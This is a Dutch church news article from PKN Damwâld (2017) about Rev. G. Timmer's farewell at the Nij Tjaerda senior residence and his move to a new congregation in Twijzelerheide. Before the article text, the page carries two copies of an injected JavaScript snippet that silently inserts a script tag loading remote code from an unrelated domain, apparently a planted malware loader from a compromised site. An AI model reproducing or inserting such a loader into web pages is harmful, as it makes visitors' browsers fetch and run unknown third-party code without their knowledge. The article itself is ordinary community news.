;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veel lof en waardering voor ds. G. Timmer in Nij Tjaerda - PKN Damwâld

Veel lof en waardering voor ds. G. Timmer in Nij Tjaerda

Gepubliceerd op: dinsdag 14 maart 2017

Zondag 26 maart komt een einde aan een bijzondere periode. Na bijna 6 jaar verbonden te zijn geweest aan Hervormd Akkerwoude c.a. verruilt ds. G. Timmer de predikantsplek in Damwâld voor een nieuwe standplaats in Twijzelerheide, alwaar hij parttime wordt verbonden aan de Hervormde Gemeente aldaar.

Dinsdagmorgen 14 maart nam ds. Timmer afscheid in (senioren wooncentrum) Nij Tjaerda van alle bewoners en omwonenden. Uiteraard ‘begon’ de tweede dinsdagmorgen van de maand zoals normaal met het Bijbeluurtje, maar dit keer werd het gevolgd door ‘koffie met gebak”.  Een groot aantal mensen kwam langs om ds. Timmer en zijn echtgenote de hand te drukken. Het was duidelijk te zien dat het predikantspaar genoot van zoveel genegenheid en waardering. In z’n dankwoord vertelde ds. Timmer dat hij het Bijbeluurtje, de Viering van het Avondmaal en de omgang en gesprekken met de bewoners/omwoners als heel bijzonder en verrijkend heeft ervaren. Kerkelijke afkomst en woonplaats speelden daarbij geen rol. Ook dankte hij de aanwezigen voor al het vertrouwen dat hij in de afgelopen jaren onder de bewoners en omwonenden van Nij Tjaerda mocht ontvangen

Zijn persoonlijkheid en manier van optreden heeft voor veel waardering én zelfs voor een groeiende verbondenheid gezorgd. Het is altijd moeilijk om afscheid te nemen van een predikant, die veel heeft betekend voor mensen in onze gemeente. Maar om het in ‘Bijbeluur-termen’ te omschrijven: In de Bijbel is ieder vertrek, ieder afscheid altijd weer de opening voor iets nieuws.  Het is een van de grondtrekken van de Bijbel: Gods volk is altijd onderweg. En het geloof begint daar waar mensen in staat zijn om iets of iemand los te laten en in vertrouwen vooruit te kijken. Hoe onzeker de toekomst ook mag zijn. Want de weg gaat altijd verder, de wereld in, met de wens van Christus’ vrede in ons hart.

We mogen weten dat God alle dingen leidt en bidden de familie Timmer dan ook toe dat ze ook in Twijzelerheide een hele goede en vruchtbare tijd mogen hebben. De Here ga hen voor op het levensspoor en geve hen elke dag Zijn onmisbare zegen.